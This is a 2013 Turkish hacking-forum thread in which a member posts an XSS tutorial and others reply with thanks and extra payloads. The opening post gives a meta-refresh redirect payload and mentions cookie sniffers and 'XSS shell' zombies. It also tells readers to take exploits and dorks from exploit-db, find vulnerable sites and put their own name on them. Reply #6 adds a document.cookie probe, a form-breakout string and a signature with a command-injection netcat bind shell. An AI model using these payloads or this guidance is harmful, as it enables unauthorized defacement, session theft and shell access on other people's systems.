THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

XSS geniş anlatım ve mantığı!

WhooLe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
Hunger Games
Mesajlar:
1.699
Konular:
152
Teşekkür (Etti):
795
Teşekkür (Aldı):
420
Ticaret:
(0) %
11-06-2013 10:34
#1
XSS geniş anlatım ve mantığı!

Merhaba arkadaşlar bugün size XSS açığından bahsedeceğim.XSS açığı kolay bir açıktır daha çok dorklarla bulunmaz siz kendiniz bulursunuz.Hedef site için bire birdir.

XSS açığının mantığı bizim uzaktan HTML kod çalıştırabilmemizdir.Veyahutta PHP.Biz bu kodu çalıştırdığımızda örneğin;<h1>WhooLe</h1> yazdığımızda eğer WhooLe çıkar h1 ler çıkmaz ise sitede XSS açığı vardır.Bilmeyenler için h1 HTML koddur siz bunu <b> de yapabilirsiniz.

XSS nerelerde bulunur?

XSS açığı genelde ziyaretçi defterlerinde bulunur. Biz ziyaretçi defterine <h1>WhooLe</h1>
yazdıpımızda WhooLe çıkıyorsa XSS açığı var.XSS search bölümlerinde,site sonlarındada bulunur.
Buyrun Resim;

XSS ile ne yapabiliriz?
XSS ile HTML kod çalıştırabildiğimiz için siteye m e t a kodu yani yönlendirme kodu verebiliriz.Yani XSS olan bir sitede
Kod:
<m e t a http-equiv="r e f r e s h" content="5;URL=http://www.turkhackteam.net/">
not;boşlukları siliniz.
yazarsak siteyi turkhackteam.net adresine yönlendirmiş oluruz.M e t a bunun için vardır.

XSS ile başka neler yapabiliriz?
XSS açığı'ndan yararlanarak siteye snifer kurabiliriz.Snifer bizim admin olmamızı sağlar.
buyrun snifer kurulumu;PHP ile XSS için Sniffer Yazma on Vimeo

XSS shell nedir?
Xss Shell xss açıklarını kullanarak birden fazla kullanıcıya erişerek onları birer zombi olarak kullanmaktır.Windows serverımıza attığımız asp dosyalarının yardımıyla xss açığı bulunan sayfayı açan kullanıcı tarayıcıyı kapatmadığı sürece bizim kontrolümüzdedir.
Daha fazlası için;http://www.turkhackteam.net/exploitl...ell-nedir.html

Site uzantısı ile XSS;:: DTOP ::
bakın bu sitede birşey dikkat çekiyor urldeki WhooLe yazısı.
Bu yöntem url ile XSS dir fotoğraf;

XSS Exploitleri;
XSS için exploit bulmayı göstereyim şimdide.
şimdi exploit-db.com sitesine gidelim ve Web Aplications bölümünden kendimize bir xss açığı seçelim.Burdan dorka bakalım google'de araştıralım.Ve orada anlattığı gibi yapalım.
Sonra adamın nickiyle kendi nickimizi kod olarak değiştirelim.Tebrikler bir site hacklediniz!
WhooLe tarafından anlatılmıştır,alıntı değildir.
---------------------
Allah'a Emanet kardeşlerim ,abilerim.

Duydumki LeBlanc nerf atmışsın rito ama unutmaki babanın s4de 2000 LeBlanc oyunu var.

The Master of LeBlanc.
Konu WhooLe tarafından (13-06-2013 00:54 Saat 00:54 ) değiştirilmiştir.
Ghost3503 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2013
Nereden:
C//
Yaş:
27
Mesajlar:
135
Konular:
20
Teşekkür (Etti):
8
Teşekkür (Aldı):
6
Ticaret:
(0) %
12-06-2013 22:28
#2
güzel anlatmışsın ama ben anlamadım
--------------------- Önündeki En Büyük Engel Düşüncelerindir Şifreler Değil...
SlimeDont - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
12/2012
Mesajlar:
805
Konular:
199
Teşekkür (Etti):
11
Teşekkür (Aldı):
62
Ticaret:
(0) %
12-06-2013 22:57
#3
Çok güzel bir anlatım olmuş hedef site bulup resim eklersen sabite alınabilir
telefon1 Teşekkür etti.
Hure44 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Mesajlar:
6
Konular:
3
Teşekkür (Etti):
4
Teşekkür (Aldı):
0
Ticaret:
(0) %
13-06-2013 16:29
#4
Kardeşim Çok güzel anlatmıssın İşime yaradı teşekürler
WhooLe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2012
Nereden:
Hunger Games
Mesajlar:
1.699
Konular:
152
Teşekkür (Etti):
795
Teşekkür (Aldı):
420
Ticaret:
(0) %
14-06-2013 15:43
#5
Alıntı:
Ghost3503´isimli üyeden Alıntı Mesajı göster
güzel anlatmışsın ama ben anlamadım
Kardeşim burada bal gibi anlatım yapmışım neyini anlamadın?
Alıntı:
SlimeDont´isimli üyeden Alıntı Mesajı göster
Çok güzel bir anlatım olmuş hedef site bulup resim eklersen sabite alınabilir
Teşekkürler.Resim Eklendi ++
Alıntı:
Hure44´isimli üyeden Alıntı Mesajı göster
Kardeşim Çok güzel anlatmıssın İşime yaradı teşekürler
Ne mutlu bana ozaman.
---------------------
Allah'a Emanet kardeşlerim ,abilerim.

Duydumki LeBlanc nerf atmışsın rito ama unutmaki babanın s4de 2000 LeBlanc oyunu var.

The Master of LeBlanc.
db43 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Nereden:
root@db43
Mesajlar:
807
Konular:
51
Teşekkür (Etti):
13
Teşekkür (Aldı):
114
Ticaret:
(0) %
14-06-2013 16:08
#6
Eline sağlık güzel anlatmışsın xss açığını denemek için
Kod:
javascript:alert(********.cookie);
kodunu da deneyebilirsin ayrıca yazı alanı gördüğünüzde
Kod:
 </textarea> </form> kodlar
denemeyi unutmayın

Not:Yıldızlı olan yer d o c u m e n t olacak isterseniz "XSS" vs. de deneyebilirsiniz dikkat etmeniz gereken tek şey içeri yazdığınız değişken değil ise tırnak kullanmaktır.
--------------------- Linux İşletim Sistemi-Backtrack-Kali Linux Dersleri

Electronics - Communication Eng.

Kod:
192.168.1.1 ; mkfifo /tmp/pipe ; sh /tmp/pipe | nc -l 4444 > /tmp/pipe
$nc xxx.xxx.xxx.xxx 4444
Webservant - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2012
Nereden:
İstanbul
Mesajlar:
1.434
Konular:
77
Teşekkür (Etti):
0
Teşekkür (Aldı):
280
Ticaret:
(0) %
30-06-2013 14:45
#7
biraz daha iyi olabilirdi ama buda iyi eline emeğine sağlık
Lyrinx - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2012
Yaş:
29
Mesajlar:
793
Konular:
152
Teşekkür (Etti):
64
Teşekkür (Aldı):
45
Ticaret:
(0) %
31-07-2013 18:42
#8
Emeğine sağlık üstad güzel döküman olmuş : ))
--------------------- Ne Kadar Detay, O Kadar Uzmanlık !

Ananymouss - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2013
Nereden:
Akhisar
Mesajlar:
1.176
Konular:
83
Teşekkür (Etti):
174
Teşekkür (Aldı):
72
Ticaret:
(0) %
31-07-2013 18:47
#9
Saol. Eline saglık

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler